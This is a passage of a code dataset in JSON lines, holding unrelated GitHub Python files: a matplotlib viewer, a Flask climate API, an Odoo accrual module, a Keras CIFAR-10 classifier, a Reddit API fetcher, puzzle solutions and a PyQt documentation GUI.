self.slices\n self.update()\n\n def update(self):\n self.im.set_data(self.X[:, :, self.ind])\n self.ax.set_ylabel('slice %s' % self.ind)\n self.im.axes.figure.canvas.draw()\n\n\ndef show3(volume, label='use scroll wheel to navigate images', ax=None, do_show=True, seg=None):\n ax = ax or plt.gca()\n fig = plt.gcf()\n if seg is not None:\n volume = np.append(volume, seg * np.max(volume), axis=1)\n tracker = IndexTracker(ax, volume)\n ax.set_title(label)\n fig.canvas.mpl_connect('scroll_event', tracker.onscroll)\n if do_show:\n plt.show()\n return fig\n\n\ndef show_element(dataset, number_of_examples=1):\n check_loader = DataLoader(dataset)\n for i, batch_data in enumerate(check_loader):\n image, label = (batch_data[\"image\"][0][0], batch_data[\"label\"][0][0])\n show3(np.append(image, label * torch.max(image), axis=1))\n if i+1 == number_of_examples:\n break\n","repo_name":"alexbagur/pancreas-segmentation-ukbb","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31098128223","text":"# /usr/bin/env python\n# encoding=utf-8\n\nimport json\n\nfrom emotion_classifiers import EmotionDictClassifier\n\nfrom bottle import route, request\n\nds = EmotionDictClassifier()\n\n\n@route('/emotion', method=\"POST\")\ndef index():\n query = request.forms.get(\"query\")\n score = ds.analyse_sentence(query, None, False)\n datas = {\"score\": score}\n json_data = json.dumps(datas)\n return json_data\n","repo_name":"Azure/CustomerReviewDataAnalyticsTutorial","sub_path":"src/Emotion/src/emotion_bottle.py","file_name":"emotion_bottle.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27133199891","text":"from jrlib import jf\nfrom api_base.contact.base_method import BaseContact\n\n\nclass InheritanceContactPhone(BaseContact):\n phone = jf.Str()\n\n def execute(self):\n return {\n \"user_id\": self.user_id,\n \"comment\": self.comment,\n \"phone\": self.phone,\n }\n\n def validate(self):\n super(InheritanceContactPhone, self).validate()\n if not self.phone or len(self.phone) != self.user_id:\n raise ValueError(\"Error phone lenght\")\n","repo_name":"katsko/jrlib_steps","sub_path":"api/inheritance_contact_phone/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28874886185","text":"import sys\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Flatten, Dense, Dropout, MaxPooling2D, BatchNormalization\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nimport os\n\n# os.environ[\"KERAS_BACKEND\"] = \"plaidml.keras.backend\"\n# from keras.layers import Conv2D, Flatten, Dense, Dropout, MaxPooling2D, BatchNormalization\n# from keras.models import Sequential\n# from keras.optimizers import SGD\n\n\nclass CNNmodel2(object):\n\n def __init__(self, img_x, img_y, channels, num_classes, name, epochs=1):\n\n self.img_x = img_x\n self.img_y = img_y\n\n self.channels = channels\n self.num_classes = num_classes\n\n self.name = name\n\n self.epochs = epochs\n self.opt = SGD(lr=0.001, momentum=0.9)\n\n def 
model(self):\n\n model = Sequential(name=self.name)\n model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\", input_shape=(self.img_x, self.img_y, self.channels)))\n model.add(BatchNormalization())\n model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer=\"he_uniform\", activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(64, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(Conv2D(64, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.3))\n\n model.add(Conv2D(128, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n model.add(Conv2D(128, kernel_size=(3, 3), kernel_initializer=\"he_uniform\",\n activation=\"relu\", padding=\"same\"))\n model.add(BatchNormalization())\n\n model.add(Flatten())\n model.add(Dropout(0.4))\n\n model.add(Dense(128, activation=\"relu\", kernel_initializer=\"he_uniform\"))\n model.add(BatchNormalization())\n model.add(Dropout(0.5))\n model.add(Dense(self.num_classes, activation=\"softmax\"))\n\n model.compile(optimizer=self.opt, loss=\"categorical_crossentropy\", metrics=['accuracy'])\n\n return model\n\n def evaluate(self, X, y, model):\n evaluation = model.evaluate(X, y)\n return evaluation\n\n @staticmethod\n def summarize_diagnostics(hist):\n\n plt.subplot(221)\n plt.title(\"Cross Entropy Loss\")\n plt.plot(hist.history['loss'], color='blue', label='train')\n plt.plot(hist.history['val_loss'], color='orange', label='test')\n\n plt.subplot(212)\n plt.title(\"Classification accuracy\")\n plt.plot(hist.history['accuracy'], color='blue', label='train')\n plt.plot(hist.history['val_accuracy'], color='orange', label='test')\n\n path = sys.argv[0].split('/')[-1]\n plt.savefig(path + \"_plot.png\")\n plt.close()\n\n\nif __name__ == '__main__':\n\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\n\n img_cols, img_rows, channels = 32, 32, 3\n num_classes = 10\n\n X_train = X_train / 255\n X_test = X_test / 255\n\n X_train = X_train.reshape((-1, img_rows, img_cols, channels))\n X_test = X_test.reshape((-1, img_rows, img_cols, channels))\n\n y_train = to_categorical(y_train, num_classes)\n y_test = to_categorical(y_test, num_classes)\n\n plt.figure(figsize=(10, 10))\n\n plt.subplot(221)\n plt.imshow(X_train[1].reshape(img_rows, img_cols, channels))\n\n plt.subplot(222)\n plt.imshow(X_test[21].reshape(img_rows, img_cols, channels))\n\n plt.subplot(223)\n plt.imshow(X_test[44].reshape(img_rows, img_cols, channels))\n\n plt.subplot(224)\n plt.imshow(X_train[54].reshape(img_rows, img_cols, channels))\n\n plt.show()\n datagen = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True)\n\n steps = int(X_train.shape[0] / 64)\n\n it_data = datagen.flow(X_train, y_train, batch_size=64)\n\n CNN = CNNmodel2(img_rows, img_cols, channels, num_classes, \"CNN_model_cifar\")\n CNN_model = CNN.model()\n history = CNN_model.fit(it_data, validation_data=(X_test, y_test), steps_per_epoch=steps, epochs=150, verbose=1)\n\n evaluation = CNN.evaluate(X_test, y_test, CNN_model)\n print(\"\\n%s %.2f%%\" % (CNN_model.metrics_names[1], evaluation[1] * 100))\n\n 
CNNmodel2.summarize_diagnostics(history)\n\n ask = input(\"Press S to save model to drive...\")\n\n if ask.upper() == \"S\":\n saved_model = CNN_model.to_json()\n with open(\"CNN_model_cifar.json\", \"w\") as json_file:\n json_file.write(saved_model)\n CNN_model.save_weights('CNN_model_cifar.h5')\n\n\n","repo_name":"Dimanssional/Adversial-Attacks-Methods","sub_path":"CNN_CIFAR.py","file_name":"CNN_CIFAR.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28763420654","text":"import osmnx as ox\nimport networkx as nx\nimport json\n\n# Specify the name of the place, and the transport mode\nplace_name = \"Istanbul, Turkey\"\nnetwork_type = 'walk'\n\n# Create a graph from the place\nG = ox.graph_from_place(place_name, network_type=network_type)\n\n# Convert graph to NetworkX format\nG_nx = nx.Graph(G)\n\n# Convert nodes and edges to dictionaries\nnodes = []\nedges = []\nfor node_id, node_data in G_nx.nodes(data=True):\n nodes.append({\n 'id': node_id,\n 'x': node_data['x'],\n 'y': node_data['y']\n })\n\nfor u, v, edge_data in G_nx.edges(data=True):\n edges.append({\n 'source': u,\n 'target': v,\n 'length': edge_data['length']\n })\n\n# Create a dictionary with graph data\ngraph_data = {\n 'nodes': nodes,\n 'edges': edges\n}\n\n# Save the graph data as JSON file\nwith open(\"istanbul_graph.json\", 'w') as f:\n json.dump(graph_data, f)\n","repo_name":"SametHaymana/geoRouteApi","sub_path":"scripts/GenerateDirectJson.py","file_name":"GenerateDirectJson.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41089492859","text":"from dateutil.relativedelta import relativedelta\n\nfrom odoo import _, api, fields, models\nfrom odoo.exceptions import UserError\nfrom odoo.tools import float_compare, float_is_zero\n\n\nclass AccountCutoff(models.Model):\n _inherit = \"account.cutoff\"\n\n picking_interval_days = fields.Integer(\n string=\"Picking Analysis Interval\",\n default=lambda self: self._default_picking_interval_days(),\n help=\"To generate the accruals based on pickings, Odoo will \"\n \"analyse all the pickings between the cutoff date and N \"\n \"days before. 
N is the Picking Analysis Interval.\",\n )\n\n _sql_constraints = [\n (\n \"picking_interval_days_positive\",\n \"CHECK(picking_interval_days > 0)\",\n \"The value of the field 'Picking Analysis Interval' must \"\n \"be strictly positive.\",\n )\n ]\n\n @api.model\n def _default_picking_interval_days(self):\n return self.env.company.default_cutoff_accrual_picking_interval_days\n\n def picking_prepare_cutoff_line(self, vdict, account_mapping):\n dpo = self.env[\"decimal.precision\"]\n assert self.cutoff_type in (\n \"accrued_expense\",\n \"accrued_revenue\",\n ), \"The field 'cutoff_type' has a wrong value\"\n qty_prec = dpo.precision_get(\"Product Unit of Measure\")\n qty = vdict[\"precut_delivered_qty\"] - vdict[\"precut_invoiced_qty\"]\n if float_is_zero(qty, precision_digits=qty_prec):\n return False\n\n company_currency = self.company_currency_id\n currency = vdict[\"currency\"]\n sign = self.cutoff_type == \"accrued_expense\" and -1 or 1\n amount = qty * vdict[\"price_unit\"] * sign\n amount_company_currency = vdict[\"currency\"]._convert(\n amount, company_currency, self.company_id, self.cutoff_date\n )\n\n # Use account mapping\n account_id = vdict[\"account_id\"]\n if account_id in account_mapping:\n accrual_account_id = account_mapping[account_id]\n else:\n accrual_account_id = account_id\n vals = {\n \"parent_id\": self.id,\n \"partner_id\": vdict[\"partner\"].id,\n \"name\": vdict[\"name\"],\n \"account_id\": account_id,\n \"cutoff_account_id\": accrual_account_id,\n \"analytic_account_id\": vdict[\"analytic_account_id\"],\n \"currency_id\": vdict[\"currency\"].id,\n \"quantity\": qty,\n \"price_unit\": vdict[\"price_unit\"],\n \"amount\": amount,\n \"cutoff_amount\": amount_company_currency,\n \"price_origin\": vdict.get(\"price_origin\"),\n }\n\n if vdict[\"taxes\"] and self.company_id.accrual_taxes:\n # vdict[\"price_unit\"] is a price without tax,\n # so I set handle_price_include=False\n tax_compute_all_res = vdict[\"taxes\"].compute_all(\n vdict[\"price_unit\"],\n currency=currency,\n quantity=qty * sign,\n product=vdict[\"product\"],\n partner=vdict[\"partner\"],\n handle_price_include=False,\n )\n vals[\"tax_line_ids\"] = self._prepare_tax_lines(\n tax_compute_all_res, self.company_currency_id\n )\n return vals\n\n def order_line_update_oline_dict(self, order_line, order_type, oline_dict):\n assert order_line not in oline_dict\n dpo = self.env[\"decimal.precision\"]\n qty_prec = dpo.precision_get(\"Product Unit of Measure\")\n # These fields have the same name on PO and SO\n order = order_line.order_id\n product = order_line.product_id\n product_uom = product.uom_id\n moves = order_line.move_ids\n ilines = order_line.invoice_lines\n oline_dict[order_line] = {\n \"precut_delivered_qty\": 0.0, # in product_uom\n \"precut_invoiced_qty\": 0.0, # in product_uom\n \"name\": _(\n \"%(order_name)s: %(order_line_name)s\",\n order_name=order.name,\n order_line_name=order_line.name,\n ),\n \"product\": product,\n \"partner\": order.partner_id.commercial_partner_id,\n }\n if order_type == \"purchase\":\n invoice_type = \"in_invoice\"\n elif order_type == \"sale\":\n invoice_type = \"out_invoice\"\n for move in moves:\n # TODO: improve comparaison of date and datetime\n # for our friends far away from GMT\n if move.state == \"done\" and move.date.date() <= self.cutoff_date:\n move_qty = move.product_uom._compute_quantity(\n move.product_uom_qty, product_uom\n )\n oline_dict[order_line][\"precut_delivered_qty\"] += move_qty\n price_origin = False\n for iline in ilines:\n invoice = 
iline.move_id\n if (\n invoice.move_type == invoice_type\n and float_compare(iline.quantity, 0, precision_digits=qty_prec) > 0\n ):\n iline_qty_puom = iline.product_uom_id._compute_quantity(\n iline.quantity, product_uom\n )\n if invoice.date <= self.cutoff_date:\n oline_dict[order_line][\"precut_invoiced_qty\"] += iline_qty_puom\n # Most recent invoice line used for price_unit, account,...\n price_unit = iline.price_subtotal / iline_qty_puom\n price_origin = invoice.name\n currency = invoice.currency_id\n account_id = iline.account_id.id\n analytic_account_id = iline.analytic_account_id.id\n taxes = iline.tax_ids\n if not price_origin:\n if order_type == \"purchase\":\n oline_qty_puom = order_line.product_uom._compute_quantity(\n order_line.product_qty, product_uom\n )\n price_unit = order_line.price_subtotal / oline_qty_puom\n price_origin = order.name\n currency = order.currency_id\n analytic_account_id = order_line.account_analytic_id.id\n taxes = order_line.taxes_id\n account = product._get_product_accounts()[\"expense\"]\n if not account:\n raise UserError(\n _(\n \"Missing expense account on product \"\n \"'%(product_display_name)s' or on its \"\n \"related product category '%(product_categ_display_name)s'.\",\n product_display_name=product.display_name,\n product_categ_display_name=product.categ_id.display_name,\n )\n )\n account_id = order.fiscal_position_id.map_account(account).id\n elif order_type == \"sale\":\n oline_qty_puom = order_line.product_uom._compute_quantity(\n order_line.product_uom_qty, product_uom\n )\n price_unit = order_line.price_subtotal / oline_qty_puom\n price_origin = order.name\n currency = order.currency_id\n analytic_account_id = order.analytic_account_id.id\n taxes = order_line.tax_id\n account = product._get_product_accounts()[\"income\"]\n if not account:\n raise UserError(\n _(\n \"Missing income account on product \"\n \"'%(product_display_name)s' or on its \"\n \"related product category '%(product_categ_display_name)s'.\",\n product_display_name=product.display_name,\n product_categ_display_name=product.categ_id.display_name,\n )\n )\n account_id = order.fiscal_position_id.map_account(account).id\n\n oline_dict[order_line].update(\n {\n \"price_unit\": price_unit,\n \"price_origin\": price_origin,\n \"currency\": currency,\n \"analytic_account_id\": analytic_account_id,\n \"account_id\": account_id,\n \"taxes\": taxes,\n }\n )\n\n def stock_move_update_oline_dict(self, move_line, oline_dict):\n dpo = self.env[\"decimal.precision\"]\n qty_prec = dpo.precision_get(\"Product Unit of Measure\")\n if self.cutoff_type == \"accrued_expense\":\n if (\n move_line.purchase_line_id\n and move_line.purchase_line_id not in oline_dict\n and not float_is_zero(\n move_line.purchase_line_id.product_qty, precision_digits=qty_prec\n )\n ):\n self.order_line_update_oline_dict(\n move_line.purchase_line_id, \"purchase\", oline_dict\n )\n elif self.cutoff_type == \"accrued_revenue\":\n if (\n move_line.sale_line_id\n and move_line.sale_line_id not in oline_dict\n and not float_is_zero(\n move_line.sale_line_id.product_uom_qty, precision_digits=qty_prec\n )\n ):\n self.order_line_update_oline_dict(\n move_line.sale_line_id, \"sale\", oline_dict\n )\n\n def get_lines(self):\n res = super().get_lines()\n spo = self.env[\"stock.picking\"]\n aclo = self.env[\"account.cutoff.line\"]\n\n pick_type_map = {\n \"accrued_revenue\": \"outgoing\",\n \"accrued_expense\": \"incoming\",\n }\n cutoff_type = self.cutoff_type\n if cutoff_type not in pick_type_map:\n return res\n\n # 
Create account mapping dict\n account_mapping = self._get_mapping_dict()\n\n min_date_dt = self.cutoff_date - relativedelta(days=self.picking_interval_days)\n\n # TODO date_done is a Datetime field, so maybe we need more clever code\n # for our friends which are far away from GMT\n pickings = spo.search(\n [\n (\"picking_type_code\", \"=\", pick_type_map[cutoff_type]),\n (\"state\", \"=\", \"done\"),\n (\"date_done\", \"<=\", self.cutoff_date),\n (\"date_done\", \">=\", min_date_dt),\n (\"company_id\", \"=\", self.company_id.id),\n ]\n )\n\n oline_dict = {} # order line dict\n # key = PO line or SO line recordset\n # value = {\n # 'precut_delivered_qty': 1.0,\n # 'precut_invoiced_qty': 0.0,\n # 'price_unit': 12.42,\n # }\n # -> we use precut_delivered_qty - precut_invoiced_qty\n for p in pickings:\n for move in p.move_lines.filtered(lambda m: m.state == \"done\"):\n self.stock_move_update_oline_dict(move, oline_dict)\n\n # from pprint import pprint\n # pprint(oline_dict)\n for vdict in oline_dict.values():\n vals = self.picking_prepare_cutoff_line(vdict, account_mapping)\n if vals:\n aclo.create(vals)\n return res\n","repo_name":"camptocamp/smartcamp_core","sub_path":"account_cutoff_accrual_picking/models/account_cutoff.py","file_name":"account_cutoff.py","file_ext":"py","file_size_in_byte":11196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71503851345","text":"import time\nimport requests\n\n\ndef read_example() -> None:\n res = requests.get('http://example.com')\n print(res.status_code)\n\n\nsync_start = time.time()\n\nread_example()\nread_example()\n\nsync_end = time.time()\n\nprint(f'Sync running took {sync_end-sync_start:0.4f} seconds')\n","repo_name":"OneHandedPirate/Books","sub_path":"Python Concurrency with asyncio/1 Getting to know asyncio/1.7_37_sync_status_code_reading.py","file_name":"1.7_37_sync_status_code_reading.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16676454497","text":"#reduce() - reduces whole list or dictionary to a single value\n#each element is processed one by one using some lambda function\nfrom functools import reduce\nnum = [5, 7, 12, 4, 1]\ntotalSum = reduce(lambda x,y : x+y, num)\nprint(totalSum) #29\n\n#using reduce to get maximum element from list\nnum = [5, 7, 12, 4, 1, 99, 68]\nmaxElement = reduce(lambda x,y : x if x>y else y, num)\nprint(maxElement) #99\n\nname = ['ferrari', 'bmw', 'lamborgini', 'tesla', 'audi', 'porsche', 'volkswag']\nlongestName = reduce(lambda x,y : x if len(x)>=len(y) else y, name)\nprint(longestName) #lamborgini\n","repo_name":"vrrohan/Python100DaysOfCode","sub_path":"Day12-LambdaFunctions/Py4-LambdaReduce.py","file_name":"Py4-LambdaReduce.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13001083138","text":"import sys\nsys.stdin = open(\"D4_5122_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(T):\n N, M, L = map(int, input().split())\n data = list(map(int, input().split()))\n for _ in range(M):\n cal = list(map(str, input().split()))\n if cal[0] == 'I':\n data.insert(int(cal[1]), int(cal[2]))\n elif cal[0] == 'D':\n data.pop(int(cal[1]))\n else:\n data[int(cal[1])] = int(cal[2])\n if len(data) - 1 >= L:\n print(\"#{} {}\".format(test_case + 1, data[L]))\n else:\n print(\"#{} {}\".format(test_case + 1, 
-1))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D4_5122.py","file_name":"D4_5122.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72632120466","text":"points = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137, \"(\":1, \"[\":2, \"{\":3, \"<\":4}\r\nmatch = {\")\": \"(\", \"]\": \"[\", \"}\": \"{\", \">\": \"<\"}\r\ntotal = 0\r\ntotals_p2 = []\r\n\r\nwith open(\"tag10.txt\") as f:\r\n for line in f:\r\n stack = []\r\n corrupt = False\r\n line = line.strip()\r\n for c in line:\r\n if c in [\"(\", \"[\", \"{\", \"<\"]:\r\n stack.append(c)\r\n else:\r\n if stack[-1] == match[c]:\r\n stack.pop()\r\n else:\r\n total += points[c]\r\n corrupt = True\r\n break\r\n \r\n #part 2\r\n p2 = 0\r\n if not corrupt and len(stack) > 0:\r\n for i in reversed(stack):\r\n p2 = p2 * 5 + points[i]\r\n totals_p2.append(p2)\r\n\r\n\r\nprint(total)\r\ntotals_p2.sort()\r\nprint(totals_p2[int(len(totals_p2)*0.5)])","repo_name":"AwesomeAxolotl/Advent_of_Code_2021","sub_path":"tag10.py","file_name":"tag10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20676258456","text":"import numpy as np\r\nimport sqlalchemy\r\nfrom sqlalchemy.ext.automap import automap_base\r\nfrom sqlalchemy.orm import Session\r\nfrom sqlalchemy import create_engine, func, inspect\r\nfrom flask import Flask, jsonify\r\nimport datetime as datetime\r\n\r\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\r\nBase = automap_base()\r\nBase.prepare(engine, reflect=True)\r\nMeasurement = Base.classes.measurement\r\nStation = Base.classes.station\r\nsession = Session(engine)\r\n\r\napp = Flask(__name__)\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route(\"/\")\r\ndef homepage():\r\n\r\n return (\r\n f\"Avalable Routes:
\"\r\n f\"/api/v1.0/precipitation\"\r\n f\"- Dates and temperature observations from the last year
\"\r\n\r\n f\"/api/v1.0/stations\"\r\n f\"- List of stations
\"\r\n\r\n f\"/api/v1.0/tobs\"\r\n f\"- Temperature Observations from the past year
\"\r\n\r\n f\"/api/v1.0/\"\r\n f\"- Minimum temperature, the average temperature, and the max temperature for a given start day
\"\r\n\r\n f\"/api/v1.0//\"\r\n f\"- Minimum temperature, the average temperature, and the max temperature for a given start-end range
\"\r\n )\r\n\r\n@app.route(\"/api/v1.0/precipitation\")\r\ndef pcrp():\r\n today = datetime.datetime.today()\r\n today = today.date()\r\n last_year = today - datetime.timedelta(365)\r\n pcp_year = list(session.query(Measurement.date, Measurement.prcp).filter((Measurement.date <= today, Measurement.date >= last_year)).all())\r\n return jsonify(pcp_year)\r\n\r\n@app.route(\"/api/v1.0/stations\")\r\ndef station_list():\r\n st_list = session.query(Station.station).all()\r\n all_stations= list(np.ravel(st_list))\r\n return jsonify(all_stations)\r\n\r\n@app.route(\"/api/v1.0/tobs\")\r\ndef temp_year():\r\n today = datetime.datetime.today()\r\n today = today.date()\r\n last_year = today - datetime.timedelta(365)\r\n temp_year = session.query(Measurement.date, Measurement.tobs).filter((Measurement.date <= today, Measurement.date >= last_year)).all()\r\n return jsonify(temp_year)\r\n\r\n@app.route(\"/api/v1.0/\")\r\ndef start_temp(start):\r\n temp_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).all()\r\n return jsonify(temp_data)\r\n\r\n \r\n\r\n@app.route(\"/api/v1.0//\")\r\ndef range_temp(start, end):\r\n temp_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter((Measurement.date >= start, Measurement.date <= end)).all()\r\n \r\n return jsonify(temp_data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n# import datetime as datetime\r\n# import numpy as np\r\n# import pandas as pd\r\n\r\n# import sqlalchemy\r\n# from sqlalchemy.ext.automap import automap_base\r\n# from sqlalchemy.orm import Session\r\n# from sqlalchemy import create_engine, func\r\n\r\n# from flask import Flask, jsonify\r\n\r\n\r\n# def get_session_tables():\r\n# engine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\r\n# Base = automap_base()\r\n# Base.prepare(engine, reflect=True)\r\n# Measurement = Base.classes.measurement\r\n# Station = Base.classes.station\r\n# session = Session(engine)\r\n# return (session, Measurement, Station)\r\n\r\n# app = Flask(__name__)\r\n\r\n# @app.route(\"/\")\r\n# def homepage():\r\n# # thread gets created to service the request\r\n# \"\"\"List of all returnable API routes.\"\"\"\r\n# return(\r\n# f\"(Note: Dates range from 2010-01-01 to 2017-08-23).

\"\r\n# f\"Available Routes:
\"\r\n\r\n# f\"/api/v1.0/precipitation
\"\r\n# f\"Returns dates and temperature from the last year.

\"\r\n\r\n# f\"/api/v1.0/stations
\"\r\n# f\"Returns a json list of stations.

\"\r\n\r\n# f\"/api/v1.0/tobs
\"\r\n# f\"Returns list of Temperature Observations(tobs) for previous year.

\"\r\n\r\n# f\"/api/v1.0/yyyy-mm-dd/
\"\r\n# f\"Returns an Average, Max, and Min temperatures for a given start date.

\"\r\n\r\n# f\"/api/v1.0/yyyy-mm-dd/yyyy-mm-dd/
\"\r\n# f\"Returns an Average, Max, and Min temperatures for a given date range.\"\r\n\r\n \r\n# )\r\n\r\n# # Note - here we are getting the db variables\r\n# # within the same thread that's servicing the request\r\n# # So we don't throw some programming error on Windows machines\r\n# @app.route(\"/api/v1.0/precipitation\")\r\n# def precipitation():\r\n# # connection to the db, session, tables\r\n# session, Measurement, Station = get_session_tables()\r\n# \"\"\"Return Dates and Temp from the last year.\"\"\"\r\n# precip_analysis = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= \"2016-08-23\").\\\r\n# filter(Measurement.date <= \"2017-08-23\").all()\r\n\r\n# # creates JSONified list\r\n# precipitation_list = [precip_analysis]\r\n\r\n# return jsonify(precipitation_list)\r\n\r\n# if __name__ == '__main__':\r\n# app.run(debug=True)","repo_name":"damianmc88/SQLAlchemy_Climate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7036930811","text":"#!/usr/bin/python3\n\"\"\"Write a function that queries the Reddit API and prints the titles\nof the first 10 hot posts listed for a given subreddit.\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"Print first 10 hot posts listed for a given subreddit\"\"\"\n url = \"https://www.reddit.com/r/{}/hot/.json\".format(subreddit)\n headers = {\n \"User-Agent\": \"cyrusDev@alx-holbertonschool\"\n }\n params = {\n \"limit\": 10\n }\n response = requests.get(url, headers=headers, params=params,\n allow_redirects=False)\n if response.status_code == 404:\n print(\"None\")\n return\n posts = response.json().get(\"data\").get(\"children\")\n for post in posts:\n print(post.get(\"data\").get(\"title\"))\n","repo_name":"cyrusDev1/alx-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13598491937","text":"#!/usr/bin/python3\n# MDDocGUI\nimport sys\nimport os\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QWidget, QCheckBox, QApplication, QMainWindow, QFileDialog, QTableView, QMessageBox\nfrom PyQt5.uic import loadUi\nimport time\nimport string\nfrom MDDoc import MDDoc\nfrom subprocess import call\nimport http.server\nimport socketserver\n# Load paremeters\n#import Param\n#Param.param.init('H:/cloud/cloud_data/Projects/REFT/Software/GUIApp/REFTCode/init/init.xml')\n#Param.param.read()\n#Param.param.printParams()\n\nfileDirMDDoc = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(fileDirMDDoc + '\\\\init')\nimport Param\n\nimport threading\nfrom shutil import copyfile, rmtree\nfrom YAML import YAML\n#param = Param('H:/cloud/cloud_data/Projects/MDDoc/init/init.xml')\n#param.read()\n\n\n \nclass MDDocGUI(QMainWindow):\n \n # Events\n keyPressed = QtCore.pyqtSignal(QtCore.QEvent)\n drawing = None\n orders = None\n params = None\n current_order = None\n milling = None\n doc = MDDoc()\n httpd = None\n doc_exist = False\n doc_open = False\n thread_server = None\n yaml = YAML()\n paramsRestart = dict() \n ui = None\n \n def __init__(self):\n # Init GUI \n print('test')\n Param.param.read()\n Param.param.printParams()\n self.params=Param.param.params;\n \n \n print('UIPath: ', 
self.params['UIPath'])\n UIPath = self.params['UIPath']\n super(MDDocGUI,self).__init__()\n \n self.ui = loadUi(UIPath, self)\n self.setWindowTitle('MDDoc')\n \n # Init parameter\n self.paramsRestart = self.yaml.load(self.params['ParamsRestartPath'])\n self.SourceFolder.setText(self.paramsRestart['SourceFolder'])\n self.DestinationFolder.setText(self.paramsRestart['DestinationFolder'])\n \n # Set callback functions\n self.CreateDocButton.clicked.connect(self.on_CreateDocButton)\n self.StatusLine.append(\"Initialization started\")\n self.SourceButton.clicked.connect(self.on_SourceButton)\n self.DestinationButton.clicked.connect(self.on_DestinationButtonButton)\n \n self.OpenDocButton.clicked.connect(self.on_OpenDocButton)\n self.CloseDocButton.clicked.connect(self.on_CloseDocButton)\n \n \n self.SourceFolder.textChanged.connect(self.on_textChanged_SourceFolder)\n self.DestinationFolder.textChanged.connect(self.on_textChanged_DestinationFolder)\n \n SourceFolder = self.SourceFolder.text()\n DestinationFolder = self.DestinationFolder.text()\n self.doc_exist = os.path.isfile(DestinationFolder + '/index.html')\n \n if (not os.path.isdir(SourceFolder)) or (not os.path.isdir(DestinationFolder)):\n self.CreateDocButton.setEnabled(False)\n \n self.OpenDocButton.setEnabled(self.doc_exist)\n self.CloseDocButton.setEnabled(self.doc_open)\n \n #self.ui.btnExit.clicked.connect(self.close)\n #self.ui.actionExit.triggered.connect(self.close)\n \n #self.milling = Milling.Milling('milling', self.params['DatabaseSQLitePath'])\n #reload(DrawingClass)\n \n # Drawing tab\n #self.LoadOrdersButton.clicked.connect(self.on_LoadOrdersButton)\n #self.CreateDrawingButton.clicked.connect(self.on_CreateDrawingButton)\n #self.OrdersTable.clicked.connect(self.on_clicked_OrdersTable) \n #self.StatusLine.append(\"Initialization started\")\n \n # Milling tab\n #self.LoadOrdersMillingButton.clicked.connect(self.on_LoadOrdersButton)\n #self.CreateMillingButton.clicked.connect(self.on_clicked_CreateMillingButton)\n #self.OrdersMillingTable.clicked.connect(self.on_clicked_OrdersMillingTable) \n \n def closeEvent(self, event):\n print(\"event\")\n 